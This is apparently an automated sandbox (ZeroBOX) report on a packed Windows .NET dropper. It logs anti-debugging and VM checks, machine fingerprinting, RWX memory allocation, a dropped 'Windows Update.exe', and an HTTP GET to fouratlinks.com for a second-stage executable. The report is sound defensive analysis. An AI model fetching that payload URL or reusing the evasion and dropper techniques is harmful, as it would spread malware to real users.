Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 5, 2021, 10:41 a.m.	Nov. 5, 2021, 10:49 a.m.

Size	221.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b5bd8dfef7366e06844f2b8595dd9910`
SHA256	`1fd1e4dac636a9e9bf400b197dd19633797be8d3cbc9cffbf29ee38496def001`
CRC32	`FB95F7AA`
ssdeep	`6144:3k0YQ9zUQcRbYqfGL0lwu3okf3iZY3PhHnD:3k0Z3cRbYqfGL0lwu3oC3im/hHD`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file

v8hBqWuKscbjZRqNatPw.exe "C:\Users\test22\AppData\Local\Temp\v8hBqWuKscbjZRqNatPw.exe"
2784
- Windows Update.exe "C:\Users\test22\AppData\Local\Temp\Windows Update.exe"
  3004

Name	Response	Post-Analysis Lookup
google.com	A 142.250.66.78	172.217.161.78
fouratlinks.com	A 199.192.17.247	199.192.17.247

IP Address	Status	Action
142.250.66.78	Active	Moloch
164.124.101.2	Active	Moloch
199.192.17.247	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 199.192.17.247:80 -> 192.168.56.101:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 5, 2021, 10:41 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Nov. 5, 2021, 10:41 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 5, 2021, 10:41 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 10:41 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 5, 2021, 10:41 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://fouratlinks.com/stockmerchandise/regular_punch_rec/zbqackY6g2W8AyNWZ8NJ.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 137 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40e1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4360000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4360000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4360000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4360000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4360000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4361000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4361000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4361000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4361000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef435e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0004c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00181000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00182000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00183000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00184000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00045000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00185000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00186000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00046000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00187000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0004a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 10:41 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00047000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\Windows Update.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\Windows Update.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\Windows Update.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 5, 2021, 10:41 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process v8hbqwukscbjzrqnatpw.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Nov. 5, 2021, 10:41 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 01:47:51 GMT Server: Apache Last-Modified: Mon, 01 Nov 2021 16:20:50 GMT ETag: "95c00-5cfbc8f633c80" Accept-Ranges: bytes Content-Length: 613376 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELaà"0¼¼ À@ @H¼SÀ ¹ H.text¤ `.rsrc ¹Àº @@.reloc Z @B¼HøwPDM¼º@ÀøWúMòpÞH{º%¥'oJ¿æQ4íGÉsR¼T«r¢úîVÚ¤A:ÑRDÑuÝ-¤äñÐu®aµ¬&0ÌöKG`'ð·_ûIÎQµ¹sã l¸ålKÁi?ôÑtÌ'Û¤Dey×àÈíèúêÿ0ú}êqÆtA"9¯â0'm0Âw<hûý°¨oÙ}a=Ñ=C}»X}×gÜ¯lÈ®ÎB8 vÓó¾Æ\|rÇÌ¬ôÊ^/0«À=åc£x.ef\|§¡\9÷9Ç2-Ú!c"2¹mËN(ç[\[0úHjÞ¬n¤Má± ]ºRâÀF+ÅOÙh}çKÂhÆû§ÑyA,X%5ªÅÇÉõwº¡ZhÉm£´¯óÒ;ËÝ´q\V³Z¶ªÞÜB×ùD«d:-váØw»3ÖYböµ~96¢ï\\|_`x¿~NSÃû »\|¨u¿?Õ² ´ÿMó;õ§ïS½Úc××äç$^ëlx: wÜÂØÝ&N#@V³4£/®æþ³©ü_©¥ï¥V`®8#¥dWGQÛîw8ßºbe #ÀË(îÂ$û?Bm}ÃàÍçVe¤>©lûBw?itD é¹ÅàÝ3b¿á~½[9âVXôH7ò84#GSÇ`þÃcZÈÍÏnÂsKÁ¾%2'/B\Ý]?Aª&¿öSË9Äbjtÿ:÷÷VEÚXoñIÊ^>Io6·{Ü]R8PoÇ¹É·èx ¯xèÈÎSí2VÏ,P¶Ðõ)bþMà4IR¡<ùs!8Ä;ÍEñC)!ôUM¶´&åØà4 Êt ØqÅ94ÅÊ¨iÿ`Ø³WØMGz}r¯q!3¯::êö{SÊ"wwÔeð£/%Wª4ÑÐ±èÀÜ§F<ÔUt ºöø$ÊßE½RÍ´ @®îLÁÍYwiïÌàpNÛ.Ì6ÂR+bÜéÕ¬íÀU»!¹kèÉï ¯$§#í[ÒÕ§ú\+gt±Ù YÐ÷Fò¸ç6wÁzÑÛì\|ú ¹Æ¦æ& ¯ÉÜ¼ÌeÔ¢ê®y { d kb¹ª9 ^¸3VÄMQcÕ9fÖàæ4öõ¢Rá»tWÚ~3upFõVØk/cO tRÕKõÎæÝ#Ï¢o> SÅ%{`¬C -A²GDZt\|¼Ù@{=>àRcÄ¡iT!ø· 1ÅZÇ.ø;P\|íL8uÒ©sJþ /±sv¥ õcJT © -FKÖ!e¥zº»æ$¿_u½rNZU4V%nfý%×Ôyh6,^fOò7Ézæ;þüËâé!ÔÙi¿ºÒGÞÊnÅu¿¦½;TzK #¹Æp½FÇn@t\|ô'²20ô g¸È fqÃ(¢çH·ÄË×Z<©ÂþÜ°à\|ó}M¯m>ÿ5Åìá«àýæûõÎÉÄlÈ^{Â-ZyV:Pî¢§ ;E»2á="iE£Eü~aï2½À>¹û8DTmV!^KKå¢,³¨6+ñ)Jè°7äà«åÍ=ÌênTRà¤45ÛfU½Nbó{;§ùû¨VÐÈ¢x´ÒÎðCÆ¸)>1ÊÀu/4í«o#¾i°FSb=~1Ã>¬tÍ5netYm®µÿ'ùE `ïD.âM?Áé$ ?RªÜ8&Ì3~¡7ØEÈz0* Ç@èW_âi»<¿«"àí1Êú%E/"¾¼I >7I C"fnÿá$ÔµoÌ]LÊÔÕÌëLFzþ;¡s}£ì´¢jÐ2oæ`ã@L§ü/µí_ð!ç¯ì,B0ÿá$ÔµoÌ]LÊÔÕÌëLFzþ;¡s}£ì´¢jÐ2oæ`ã@L§üefç~ì^â¥`³è>CëP¥fèÂd¡sùA#üþa`F¬e<ë´¹åòQ½ê0@Ñóª£DÌ¶\|§[!I[gÌT¬æ ®:QF¤CÛÞP) 2Ã%BA ÆÍ-äéÑ{à\ñ fsmàÊQLðØ¥iá%Lyò±ñõtÁ3aN²¤>¡âw- t§%ÑZ¥ó&N§Z5bÇÚ)Ú~ð\\{!Påý9gÕ%ÓýtúæeFÂî~@ý¶ï°êy`pMëÅi#.büà8eT¯Fûò°èª[ákûyõþiV0++m2Ð^KI°°ÝÐ{®¶yý!ñcÕ¤/nb¹Å¦ñÕüÙPe´Z¯ÖE[jÎÊ¤26 çï_ï1pÝdPg~"ô§ÜÚH2ç³û#¨ ªÀDÕ] að9àé÷ received: 2920 socket: 956	1	2920	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00023600', u'virtual_address': u'0x00016000', u'entropy': 6.903327004727545, u'name': u'.rsrc', u'virtual_size': u'0x00023420'}

entropy

6.90332700473

description

A section with a high entropy has been found

entropy

0.640271493213

description

Overall entropy of this PE file is high

Generates some ICMP traffic

v8hBqWuKscbjZRqNatPw.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All